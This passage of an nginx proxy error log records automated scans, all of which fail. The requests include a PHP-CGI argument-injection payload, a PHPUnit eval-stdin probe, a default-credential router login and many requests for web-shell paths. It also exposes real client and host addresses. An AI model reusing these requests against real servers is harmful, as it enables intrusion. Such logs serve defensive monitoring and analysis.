/containers/json HTTP/1.1", host: "91.82.215.191:80" +2026/01/30 20:45:10 [error] 245#245: *13344 open() "/var/www/html/hello.world" failed (2: No such file or directory), client: 185.252.86.27, server: localhost-nginx-proxy-manager, request: "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1", host: "91.82.215.191:80" +2026/01/30 20:45:10 [error] 245#245: *13344 open() "/var/www/html/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 185.252.86.27, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/30 21:26:20 [error] 243#243: *13353 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 5.61.209.92, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.215.191:80" +2026/01/30 23:08:16 [error] 246#246: *14879 open() "/var/www/html/aaa9" failed (2: No such file or directory), client: 95.215.0.144, server: localhost-nginx-proxy-manager, request: "GET /aaa9 HTTP/1.1", host: "91.82.215.191:80" +2026/01/30 23:08:16 [error] 246#246: *14881 open() "/var/www/html/aab9" failed (2: No such file or directory), client: 95.215.0.144, server: localhost-nginx-proxy-manager, request: "GET /aab9 HTTP/1.1", host: "91.82.215.191:80" +2026/01/30 23:12:37 [error] 243#243: *14884 open() "/var/www/html/boaform/admin/formLogin" failed (2: No such file or directory), client: 115.56.127.250, server: localhost-nginx-proxy-manager, request: "GET /boaform/admin/formLogin?username=admin&psd=admin HTTP/1.0" +2026/01/30 23:27:17 [error] 243#243: *14891 open() "/var/www/html/wp-content/plugins/hellopress/wp_filemanager.php" failed (2: No such file or directory), client: 74.248.24.238, server: localhost-nginx-proxy-manager, request: "GET /wp-content/plugins/hellopress/wp_filemanager.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/30 23:27:17 [error] 243#243: *14891 open() "/var/www/html/baidu.php" failed (2: No such file or directory), client: 74.248.24.238, server: localhost-nginx-proxy-manager, request: "GET /baidu.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/30 23:27:17 [error] 243#243: *14891 open() "/var/www/html/Jcrop.php" failed (2: No such file or directory), client: 74.248.24.238, server: localhost-nginx-proxy-manager, request: "GET /Jcrop.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/30 23:27:17 [error] 243#243: *14891 open() "/var/www/html/xfile25.php" failed (2: No such file or directory), client: 74.248.24.238, server: localhost-nginx-proxy-manager, request: "GET //xfile25.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/30 23:27:17 [error] 243#243: *14891 open() "/var/www/html/aurax.php" failed (2: No such file or directory), client: 74.248.24.238, server: localhost-nginx-proxy-manager, request: "GET /aurax.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/30 23:27:17 [error] 243#243: *14891 open() "/var/www/html/ok.php" failed (2: No such file or directory), client: 74.248.24.238, server: localhost-nginx-proxy-manager, request: "GET /ok.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/30 23:27:17 [error] 243#243: *14891 open() "/var/www/html/tourpa.php" failed (2: No such file or directory), client: 74.248.24.238, server: localhost-nginx-proxy-manager, request: "GET /tourpa.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/30 23:27:17 [error] 243#243: *14891 open() "/var/www/html/wxpass.php" failed (2: No such file or directory), client: 74.248.24.238, server: localhost-nginx-proxy-manager, request: "GET /wxpass.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/30 23:27:17 [error] 243#243: *14891 open() "/var/www/html/il.php" failed (2: No such file or directory), client: 74.248.24.238, server: localhost-nginx-proxy-manager, request: "GET /il.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/30 23:27:17 [error] 243#243: *14891 open() "/var/www/html/muzu.php" failed (2: No such file or directory), client: 74.248.24.238, server: localhost-nginx-proxy-manager, request: "GET /muzu.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/30 23:27:17 [error] 243#243: *14891 open() "/var/www/html/sd.php" failed (2: No such file or directory), client: 74.248.24.238, server: localhost-nginx-proxy-manager, request: "GET /sd.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/30 23:27:17 [error] 243#243: *14891 open() "/var/www/html/fi.php" failed (2: No such file or directory), client: 74.248.24.238, server: localhost-nginx-proxy-manager, request: "GET /fi.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/30 23:27:17 [error] 243#243: *14891 open() "/var/www/html/zfe.php" failed (2: No such file or directory), client: 74.248.24.238, server: localhost-nginx-proxy-manager, request: "GET //zfe.php?p= HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/30 23:27:17 [error] 243#243: *14891 open() "/var/www/html/save.php" failed (2: No such file or directory), client: 74.248.24.238, server: localhost-nginx-proxy-manager, request: "GET /save.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/30 23:27:17 [error] 243#243: *14891 open() "/var/www/html/X5fCS.php" failed (2: No such file or directory), client: 74.248.24.238, server: localhost-nginx-proxy-manager, request: "GET /X5fCS.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/30 23:27:17 [error] 243#243: *14891 open() "/var/www/html/jsond.php" failed (2: No such file or directory), client: 74.248.24.238, server: localhost-nginx-proxy-manager, request: "GET /jsond.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/30 23:27:17 [error] 243#243: *14891 open() "/var/www/html/aa2.php" failed (2: No such file or directory), client: 74.248.24.238, server: localhost-nginx-proxy-manager, request: "GET /aa2.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/30 23:27:17 [error] 243#243: *14891 open() "/var/www/html/reze.php" failed (2: No such file or directory), client: 74.248.24.238, server: localhost-nginx-proxy-manager, request: "GET /reze.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/30 23:27:17 [error] 243#243: *14891 open() "/var/www/html/ph33w.php" failed (2: No such file or directory), client: 74.248.24.238, server: localhost-nginx-proxy-manager, request: "GET /ph33w.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/30 23:27:17 [error] 243#243: *14891 open() "/var/www/html/styll.php" failed (2: No such file or directory), client: 74.248.24.238, server: localhost-nginx-proxy-manager, request: "GET /styll.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/30 23:27:17 [error] 243#243: *14891 open() "/var/www/html/it.php" failed (2: No such file or directory), client: 74.248.24.238, server: localhost-nginx-proxy-manager, request: "GET /it.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/30 23:27:17 [error] 243#243: *14891 open() "/var/www/html/wwx.php" failed (2: No such file or directory), client: 74.248.24.238, server: localhost-nginx-proxy-manager, request: "GET /wwx.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/30 23:27:17 [error] 243#243: *14891 open() "/var/www/html/x7.php" failed (2: No such file or directory), client: 74.248.24.238, server: localhost-nginx-proxy-manager, request: "GET /x7.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/30 23:27:17 [error] 243#243: *14891 open() "/var/www/html/1a.php" failed (2: No such file or directory), client: 74.248.24.238, server: localhost-nginx-proxy-manager, request: "GET /1a.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/30 23:27:17 [error] 243#243: *14891 open() "/var/www/html/thebe.php" failed (2: No such file or directory), client: 74.248.24.238, server: localhost-nginx-proxy-manager, request: "GET /thebe.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/30 23:27:17 [error] 243#243: *14891 open() "/var/www/html/ddd.php" failed (2: No such file or directory), client: 74.248.24.238, server: localhost-nginx-proxy-manager, request: "GET /ddd.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/30 23:27:17 [error] 243#243: *14891 open() "/var/www/html/ccs.php" failed (2: No such file or directory), client: 74.248.24.238, server: localhost-nginx-proxy-manager, request: "GET /ccs.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/30 23:27:17 [error] 243#243: *14891 open() "/var/www/html/sad5.php" failed (2: No such file or directory), client: 74.248.24.238, server: localhost-nginx-proxy-manager, request: "GET /sad5.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/30 23:27:18 [error] 243#243: *14891 open() "/var/www/html/xvde.php" failed (2: No such file or directory), client: 74.248.24.238, server: localhost-nginx-proxy-manager, request: "GET /xvde.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/30 23:27:18 [error] 243#243: *14891 open() "/var/www/html/wp-content/shell.php" failed (2: No such file or directory), client: 74.248.24.238, server: localhost-nginx-proxy-manager, request: "GET /wp-content/shell.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/30 23:27:18 [error] 243#243: *14891 open() "/var/www/html/f355.php" failed (2: No such file or directory), client: 74.248.24.238, server: localhost-nginx-proxy-manager, request: "GET /f355.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/30 23:27:18 [error] 243#243: *14891 open() "/var/www/html/bgymj.php" failed (2: No such file or directory), client: 74.248.24.238, server: localhost-nginx-proxy-manager, request: "GET /bgymj.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/30 23:27:18 [error] 243#243: *14891 open() "/var/www/html/wp-mt.php" failed (2: No such file or directory), client: 74.248.24.238, server: localhost-nginx-proxy-manager, request: "GET /wp-mt.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/30 23:27:18 [error] 243#243: *14891 open() "/var/www/html/lala.php" failed (2: No such file or directory), client: 74.248.24.238, server: localhost-nginx-proxy-manager, request: "GET //lala.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/30 23:27:18 [error] 243#243: *14891 open() "/var/www/html/8xyz.php" failed (2: No such file or directory), client: 74.248.24.238, server: localhost-nginx-proxy-manager, request: "GET /8xyz.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/30 23:27:18 [error] 243#243: *14891 open() "/var/www/html/la.php" failed (2: No such file or directory), client: 74.248.24.238, server: localhost-nginx-proxy-manager, request: "GET /la.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/30 23:27:18 [error] 243#243: *14891 open() "/var/www/html/ioxi.php" failed (2: No such file or directory), client: 74.248.24.238, server: localhost-nginx-proxy-manager, request: "GET /ioxi.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/30 23:27:18 [error] 243#243: *14891 open() "/var/www/html/xpwer1.php" failed (2: No such file or directory), client: 74.248.24.238, server: localhost-nginx-proxy-manager, request: "GET /xpwer1.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/30 23:27:18 [error] 243#243: *14891 open() "/var/www/html/about.php" failed (2: No such file or directory), client: 74.248.24.238, server: localhost-nginx-proxy-manager, request: "GET //about.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/30 23:27:18 [error] 243#243: *14891 open() "/var/www/html/wp-admin/images/commentv.php" failed (2: No such file or directory), client: 74.248.24.238, server: localhost-nginx-proxy-manager, request: "GET /wp-admin/images/commentv.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/30 23:27:18 [error] 243#243: *14891 open() "/var/www/html/la.php" failed (2: No such file or directory), client: 74.248.24.238, server: localhost-nginx-proxy-manager, request: "GET //la.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/30 23:27:18 [error] 243#243: *14891 open() "/var/www/html/cgi-bin/index.php" failed (2: No such file or directory), client: 74.248.24.238, server: localhost-nginx-proxy-manager, request: "GET //cgi-bin/index.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/30 23:27:18 [error] 243#243: *14891 open() "/var/www/html/admin.php/admin.php" failed (2: No such file or directory), client: 74.248.24.238, server: localhost-nginx-proxy-manager, request: "GET /admin.php/admin.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/30 23:27:18 [error] 243#243: *14891 open() "/var/www/html/wp-admin/images/wp-conflg.php" failed (2: No such file or directory), client: 74.248.24.238, server: localhost-nginx-proxy-manager, request: "GET //wp-admin/images/wp-conflg.php?p= HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/30 23:27:18 [error] 243#243: *14891 open() "/var/www/html/info.php" failed (2: No such file or directory), client: 74.248.24.238, server: localhost-nginx-proxy-manager, request: "GET /info.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/30 23:27:18 [error] 243#243: *14891 open() "/var/www/html/about.php" failed (2: No such file or directory), client: 74.248.24.238, server: localhost-nginx-proxy-manager, request: "GET /about.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/30 23:27:18 [error] 243#243: *14891 "/var/www/html/x/index.html" is not found (2: No such file or directory), client: 74.248.24.238, server: localhost-nginx-proxy-manager, request: "GET /x/ HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/30 23:27:18 [error] 243#243: *14891 open() "/var/www/html/ss1.php" failed (2: No such file or directory), client: 74.248.24.238, server: localhost-nginx-proxy-manager, request: "GET /ss1.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/30 23:27:18 [error] 243#243: *14891 open() "/var/www/html/assets/css/index.php" failed (2: No such file or directory), client: 74.248.24.238, server: localhost-nginx-proxy-manager, request: "GET //assets/css/index.php?p= HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/30 23:27:18 [error] 243#243: *14891 open() "/var/www/html/goods.php" failed (2: No such file or directory), client: 74.248.24.238, server: localhost-nginx-proxy-manager, request: "GET //goods.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/30 23:27:18 [error] 243#243: *14891 open() "/var/www/html/222.php" failed (2: No such file or directory), client: 74.248.24.238, server: localhost-nginx-proxy-manager, request: "GET /222.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/30 23:27:18 [error] 243#243: *14891 open() "/var/www/html/abcd.php" failed (2: No such file or directory), client: 74.248.24.238, server: localhost-nginx-proxy-manager, request: "GET /abcd.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/30 23:27:18 [error] 243#243: *14891 "/var/www/html/wp-includes/blocks/code/index.html" is not found (2: No such file or directory), client: 74.248.24.238, server: localhost-nginx-proxy-manager, request: "GET /wp-includes/blocks/code/ HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/30 23:27:18 [error] 243#243: *14891 open() "/var/www/html/adminfuns.php" failed (2: No such file or directory), client: 74.248.24.238, server: localhost-nginx-proxy-manager, request: "GET //adminfuns.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/30 23:27:18 [error] 243#243: *14891 open() "/var/www/html/ioxi-o.php" failed (2: No such file or directory), client: 74.248.24.238, server: localhost-nginx-proxy-manager, request: "GET /ioxi-o.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/30 23:27:18 [error] 243#243: *14891 "/var/www/html/wp-content/index.html" is not found (2: No such file or directory), client: 74.248.24.238, server: localhost-nginx-proxy-manager, request: "GET /wp-content/ HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/30 23:27:18 [error] 243#243: *14891 open() "/var/www/html/goat.php" failed (2: No such file or directory), client: 74.248.24.238, server: localhost-nginx-proxy-manager, request: "GET /goat.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/30 23:27:18 [error] 243#243: *14891 "/var/www/html/wp-includes/PHPMailer/index.html" is not found (2: No such file or directory), client: 74.248.24.238, server: localhost-nginx-proxy-manager, request: "GET /wp-includes/PHPMailer/ HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/30 23:27:18 [error] 243#243: *14891 open() "/var/www/html/xx.php" failed (2: No such file or directory), client: 74.248.24.238, server: localhost-nginx-proxy-manager, request: "GET /xx.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/30 23:27:18 [error] 243#243: *14891 "/var/www/html/.well-known/index.html" is not found (2: No such file or directory), client: 74.248.24.238, server: localhost-nginx-proxy-manager, request: "GET /.well-known/ HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/30 23:27:18 [error] 243#243: *14891 open() "/var/www/html/wp-admin/js/wp-conflg.php" failed (2: No such file or directory), client: 74.248.24.238, server: localhost-nginx-proxy-manager, request: "GET /wp-admin/js/wp-conflg.php?p= HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/30 23:27:18 [error] 243#243: *14891 open() "/var/www/html/f5.php" failed (2: No such file or directory), client: 74.248.24.238, server: localhost-nginx-proxy-manager, request: "GET /f5.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/30 23:27:18 [error] 243#243: *14891 open() "/var/www/html/doc.php" failed (2: No such file or directory), client: 74.248.24.238, server: localhost-nginx-proxy-manager, request: "GET /doc.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/30 23:27:18 [error] 243#243: *14891 open() "/var/www/html/xtride.php" failed (2: No such file or directory), client: 74.248.24.238, server: localhost-nginx-proxy-manager, request: "GET /xtride.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/30 23:27:19 [error] 243#243: *14891 open() "/var/www/html/flower.php" failed (2: No such file or directory), client: 74.248.24.238, server: localhost-nginx-proxy-manager, request: "GET /flower.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/30 23:27:19 [error] 243#243: *14891 open() "/var/www/html/flower2.php" failed (2: No such file or directory), client: 74.248.24.238, server: localhost-nginx-proxy-manager, request: "GET /flower2.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/30 23:27:19 [error] 243#243: *14891 open() "/var/www/html/f6.php" failed (2: No such file or directory), client: 74.248.24.238, server: localhost-nginx-proxy-manager, request: "GET //f6.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/30 23:27:19 [error] 243#243: *14891 open() "/var/www/html/edit.php" failed (2: No such file or directory), client: 74.248.24.238, server: localhost-nginx-proxy-manager, request: "GET //edit.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/30 23:27:19 [error] 243#243: *14891 open() "/var/www/html/aa.php" failed (2: No such file or directory), client: 74.248.24.238, server: localhost-nginx-proxy-manager, request: "GET //aa.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/30 23:27:19 [error] 243#243: *14891 open() "/var/www/html/ext.php" failed (2: No such file or directory), client: 74.248.24.238, server: localhost-nginx-proxy-manager, request: "GET /ext.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/30 23:27:19 [error] 243#243: *14891 "/var/www/html/wp-includes/js/dist/index.html" is not found (2: No such file or directory), client: 74.248.24.238, server: localhost-nginx-proxy-manager, request: "GET //wp-includes/js/dist/ HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/30 23:27:19 [error] 243#243: *14891 "/var/www/html/wp-includes/SimplePie/index.html" is not found (2: No such file or directory), client: 74.248.24.238, server: localhost-nginx-proxy-manager, request: "GET /wp-includes/SimplePie/ HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/30 23:27:19 [error] 243#243: *14891 open() "/var/www/html/av.php" failed (2: No such file or directory), client: 74.248.24.238, server: localhost-nginx-proxy-manager, request: "GET //av.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/30 23:27:19 [error] 243#243: *14891 open() "/var/www/html/wp-includes/Text/Diff/Engine/about.php" failed (2: No such file or directory), client: 74.248.24.238, server: localhost-nginx-proxy-manager, request: "GET /wp-includes/Text/Diff/Engine/about.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/30 23:27:19 [error] 243#243: *14891 open() "/var/www/html/wsd.php" failed (2: No such file or directory), client: 74.248.24.238, server: localhost-nginx-proxy-manager, request: "GET /wsd.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/30 23:27:19 [error] 243#243: *14891 open() "/var/www/html/jane.php" failed (2: No such file or directory), client: 74.248.24.238, server: localhost-nginx-proxy-manager, request: "GET /jane.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/30 23:27:19 [error] 243#243: *14891 open() "/var/www/html/classwithtostring.php" failed (2: No such file or directory), client: 74.248.24.238, server: localhost-nginx-proxy-manager, request: "GET /classwithtostring.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/30 23:27:19 [error] 243#243: *14891 open() "/var/www/html/wp-admin/css/colors/blue/index.php" failed (2: No such file or directory), client: 74.248.24.238, server: localhost-nginx-proxy-manager, request: "GET /wp-admin/css/colors/blue/index.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/30 23:27:19 [error] 243#243: *14891 open() "/var/www/html/css.php" failed (2: No such file or directory), client: 74.248.24.238, server: localhost-nginx-proxy-manager, request: "GET /css.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/30 23:27:19 [error] 243#243: *14891 open() "/var/www/html/alfa.php" failed (2: No such file or directory), client: 74.248.24.238, server: localhost-nginx-proxy-manager, request: "GET /alfa.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/30 23:27:19 [error] 243#243: *14891 open() "/var/www/html/wen.php" failed (2: No such file or directory), client: 74.248.24.238, server: localhost-nginx-proxy-manager, request: "GET /wen.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/30 23:27:19 [error] 243#243: *14891 open() "/var/www/html/x.php" failed (2: No such file or directory), client: 74.248.24.238, server: localhost-nginx-proxy-manager, request: "GET /x.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/30 23:27:19 [error] 243#243: *14891 open() "/var/www/html/xxxx.php" failed (2: No such file or directory), client: 74.248.24.238, server: localhost-nginx-proxy-manager, request: "GET /xxxx.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/30 23:27:19 [error] 243#243: *14891 open() "/var/www/html/class.php" failed (2: No such file or directory), client: 74.248.24.238, server: localhost-nginx-proxy-manager, request: "GET //class.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/30 23:27:19 [error] 243#243: *14891 open() "/var/www/html/wp-admin/css/colors/midnight/about.php" failed (2: No such file or directory), client: 74.248.24.238, server: localhost-nginx-proxy-manager, request: "GET /wp-admin/css/colors/midnight/about.php?p= HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/30 23:27:19 [error] 243#243: *14891 open() "/var/www/html/gec.php" failed (2: No such file or directory), client: 74.248.24.238, server: localhost-nginx-proxy-manager, request: "GET /gec.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/30 23:27:19 [error] 243#243: *14891 open() "/var/www/html/f35.php" failed (2: No such file or directory), client: 74.248.24.238, server: localhost-nginx-proxy-manager, request: "GET /f35.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/30 23:27:19 [error] 243#243: *14891 open() "/var/www/html/wp-admin/about.php" failed (2: No such file or directory), client: 74.248.24.238, server: localhost-nginx-proxy-manager, request: "GET /wp-admin/about.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/30 23:27:19 [error] 243#243: *14891 open() "/var/www/html/pp.php" failed (2: No such file or directory), client: 74.248.24.238, server: localhost-nginx-proxy-manager, request: "GET /pp.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/30 23:27:19 [error] 243#243: *14891 open() "/var/www/html/update/f35.php" failed (2: No such file or directory), client: 74.248.24.238, server: localhost-nginx-proxy-manager, request: "GET /update/f35.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/30 23:27:19 [error] 243#243: *14891 open() "/var/www/html/wp-content/themes/about.php" failed (2: No such file or directory), client: 74.248.24.238, server: localhost-nginx-proxy-manager, request: "GET /wp-content/themes/about.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/30 23:27:19 [error] 243#243: *14891 open() "/var/www/html/lock360.php" failed (2: No such file or directory), client: 74.248.24.238, server: localhost-nginx-proxy-manager, request: "GET //lock360.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/30 23:27:20 [error] 243#243: *14891 open() "/var/www/html/as.php" failed (2: No such file or directory), client: 74.248.24.238, server: localhost-nginx-proxy-manager, request: "GET /as.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/30 23:27:20 [error] 243#243: *14891 open() "/var/www/html/class-t.api.php" failed (2: No such file or directory), client: 74.248.24.238, server: localhost-nginx-proxy-manager, request: "GET /class-t.api.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/30 23:27:20 [error] 243#243: *14891 open() "/var/www/html/bipas.php" failed (2: No such file or directory), client: 74.248.24.238, server: localhost-nginx-proxy-manager, request: "GET /bipas.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/30 23:27:20 [error] 243#243: *14891 open() "/var/www/html/shoyo.php" failed (2: No such file or directory), client: 74.248.24.238, server: localhost-nginx-proxy-manager, request: "GET /shoyo.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/30 23:27:20 [error] 243#243: *14891 open() "/var/www/html/admin.php" failed (2: No such file or directory), client: 74.248.24.238, server: localhost-nginx-proxy-manager, request: "GET /admin.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/30 23:27:20 [error] 243#243: *14891 open() "/var/www/html/ar.php" failed (2: No such file or directory), client: 74.248.24.238, server: localhost-nginx-proxy-manager, request: "GET /ar.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/30 23:27:20 [error] 243#243: *14891 open() "/var/www/html/blurbs18.php" failed (2: No such file or directory), client: 74.248.24.238, server: localhost-nginx-proxy-manager, request: "GET /blurbs18.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/30 23:27:20 [error] 243#243: *14891 open() "/var/www/html/radio.php" failed (2: No such file or directory), client: 74.248.24.238, server: localhost-nginx-proxy-manager, request: "GET /radio.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/30 23:27:20 [error] 243#243: *14891 open() "/var/www/html/wp-good.php" failed (2: No such file or directory), client: 74.248.24.238, server: localhost-nginx-proxy-manager, request: "GET /wp-good.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/30 23:27:20 [error] 243#243: *14891 open() "/var/www/html/bless14.php" failed (2: No such file or directory), client: 74.248.24.238, server: localhost-nginx-proxy-manager, request: "GET /bless14.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/30 23:27:20 [error] 243#243: *14891 open() "/var/www/html/ol.php" failed (2: No such file or directory), client: 74.248.24.238, server: localhost-nginx-proxy-manager, request: "GET /ol.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/30 23:27:20 [error] 243#243: *14891 open() "/var/www/html/.well-known/gecko-litespeed.php" failed (2: No such file or directory), client: 74.248.24.238, server: localhost-nginx-proxy-manager, request: "GET /.well-known/gecko-litespeed.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/30 23:27:20 [error] 243#243: *14891 open() "/var/www/html/wp-admin/maint/about.php" failed (2: No such file or directory), client: 74.248.24.238, server: localhost-nginx-proxy-manager, request: "GET /wp-admin/maint/about.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/30 23:27:20 [error] 243#243: *14891 open() "/var/www/html/wp-content/admin.php" failed (2: No such file or directory), client: 74.248.24.238, server: localhost-nginx-proxy-manager, request: "GET /wp-content/admin.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/30 23:27:20 [error] 243#243: *14891 open() "/var/www/html/wp-admin/setup-config.php" failed (2: No such file or directory), client: 74.248.24.238, server: localhost-nginx-proxy-manager, request: "GET /wp-admin/setup-config.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/30 23:27:20 [error] 243#243: *14891 open() "/var/www/html/wp-includes/ID3/about.php" failed (2: No such file or directory), client: 74.248.24.238, server: localhost-nginx-proxy-manager, request: "GET /wp-includes/ID3/about.php?p= HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/30 23:27:20 [error] 243#243: *14891 open() "/var/www/html/.well-known/admin.php" failed (2: No such file or directory), client: 74.248.24.238, server: localhost-nginx-proxy-manager, request: "GET /.well-known/admin.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/30 23:27:20 [error] 243#243: *14891 open() "/var/www/html/init.php" failed (2: No such file or directory), client: 74.248.24.238, server: localhost-nginx-proxy-manager, request: "GET /init.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/30 23:27:20 [error] 243#243: *14891 open() "/var/www/html/wp-content/plugins/pwnd/as.php" failed (2: No such file or directory), client: 74.248.24.238, server: localhost-nginx-proxy-manager, request: "GET /wp-content/plugins/pwnd/as.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/30 23:27:20 [error] 243#243: *14891 open() "/var/www/html/about.php/about.php" failed (2: No 